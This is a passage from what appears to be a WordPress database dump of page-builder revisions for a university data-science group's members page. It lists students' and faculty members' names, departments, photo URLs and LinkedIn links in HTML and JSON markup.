h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c385-outer\">\n <div data-colibri-id=\"182-c385\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c385 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c386\" class=\"d-block style-913 style-local-182-c386 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Vineeth.jpg\" class=\"wp-image-831 style-913-image style-local-182-c386-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c386-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c387\" class=\"h-global-transition-all h-heading style-914 style-local-182-c387 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-914 style-local-182-c387\">\n <!---->\n <!---->\n <h4 class=\"\">Vineeth Kumar Chandha</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c388\" class=\"h-text h-text-component style-915 style-local-182-c388 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c389\" class=\"style-917 style-local-182-c389 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/vineeth-kumar-chandha-207611149/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c390-outer\">\n <div data-colibri-id=\"182-c390\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c390 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c391\" class=\"d-block style-913 style-local-182-c391 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-sathwik-2-scaled-1.jpg\" class=\"wp-image-1007 style-913-image style-local-182-c391-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c391-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c392\" class=\"h-global-transition-all h-heading style-914 style-local-182-c392 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-914 style-local-182-c392\">\n <!---->\n <!---->\n <h4 class=\"\">Sathwik Chowda</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c393\" class=\"h-text h-text-component style-915 style-local-182-c393 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n </div>\n </div>\n <div data-colibri-id=\"182-c394\" class=\"style-917 style-local-182-c394 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/sathwikchowda/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c395-outer\">\n <div data-colibri-id=\"182-c395\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c395 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c396\" class=\"d-block style-913 style-local-182-c396 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Brindal-1.jpeg\" class=\"wp-image-1599 style-913-image style-local-182-c396-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c396-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c397\" class=\"h-global-transition-all h-heading style-914 style-local-182-c397 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-914 style-local-182-c397\">\n <!---->\n <!---->\n <h4 class=\"\">Brindal Dhol</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c398\" class=\"h-text h-text-component style-915 style-local-182-c398 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c399\" class=\"style-917 style-local-182-c399 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/brindaldhol/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c400-outer\">\n <div data-colibri-id=\"182-c400\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c400 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c401\" class=\"d-block style-913 style-local-182-c401 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-ruby_parcells-scaled-1.jpg\" class=\"wp-image-853 style-913-image style-local-182-c401-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c401-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c402\" class=\"h-global-transition-all h-heading style-914 style-local-182-c402 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-914 style-local-182-c402\">\n <!---->\n <!---->\n <h4 class=\"\">Ruby Parcells</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c403\" class=\"h-text h-text-component style-915 style-local-182-c403 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Geosciences\n <br>\n </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c405-outer\">\n <div data-colibri-id=\"182-c405\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c405 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c406\" class=\"d-block style-913 style-local-182-c406 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Reshmanjali-1.jpeg\" class=\"wp-image-1600 style-913-image style-local-182-c406-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c406-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c407\" class=\"h-global-transition-all h-heading style-914 style-local-182-c407 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-914 style-local-182-c407\">\n <!---->\n <!---->\n <h4 class=\"\">Sai Reshmanjali</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c408\" class=\"h-text h-text-component style-915 style-local-182-c408 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n </div>\n </div>\n <div data-colibri-id=\"182-c409\" class=\"style-917 style-local-182-c409 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/reshmanjali-guntupalli/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c410-outer\">\n <div data-colibri-id=\"182-c410\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c410 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c411\" class=\"d-block style-913 style-local-182-c411 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bronson.png\" class=\"wp-image-817 style-913-image style-local-182-c411-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c411-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c412\" class=\"h-global-transition-all h-heading style-914 style-local-182-c412 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-914 style-local-182-c412\">\n <!---->\n <!---->\n <h4 class=\"\">Bronson Tharpe</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c413\" class=\"h-text h-text-component style-915 style-local-182-c413 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c414\" class=\"style-917 style-local-182-c414 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/bronson-tharpe-9b754a1ba/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Members','','inherit','closed','closed','','182-revision-v1','','','2023-09-29 22:13:21','2023-09-30 02:13:21','',182,'https://gsudice.dataconn.net/?p=1611',0,'revision','',0),(1617,1,'2023-09-29 22:15:14','2023-09-30 02:15:14','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Faculty\",\"attrs\":{\"id\":\"faculty\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c427\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c427\",\"index\":0,\"id\":\"182-c428\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-headshot.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":629,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c427\",\"index\":0,\"id\":\"182-c429\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c427\",\"index\":2,\"id\":\"182-c430\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c427\",\"index\":1,\"id\":\"182-c431\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=C5PVPkoAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c427\",\"index\":1,\"id\":\"182-c432\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c433\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c433\",\"index\":0,\"id\":\"182-c434\",\"partialId\":182,\"styleRef\":978,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-Portrait-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1409,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c433\",\"index\":0,\"id\":\"182-c435\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Armin Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c433\",\"index\":2,\"id\":\"182-c436\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p> Chair and Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c433\",\"index\":1,\"id\":\"182-c437\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=41ckZZsAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c433\",\"index\":1,\"id\":\"182-c438\",\"partialId\":182,\"styleRef\":979,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c439\",\"parentId\":\"182-c426\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c439\",\"index\":0,\"id\":\"182-c440\",\"partialId\":182,\"styleRef\":980,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/sunderraman1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":692,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c439\",\"index\":0,\"id\":\"182-c441\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Raj Sunderraman\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c439\",\"index\":2,\"id\":\"182-c442\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Chair and 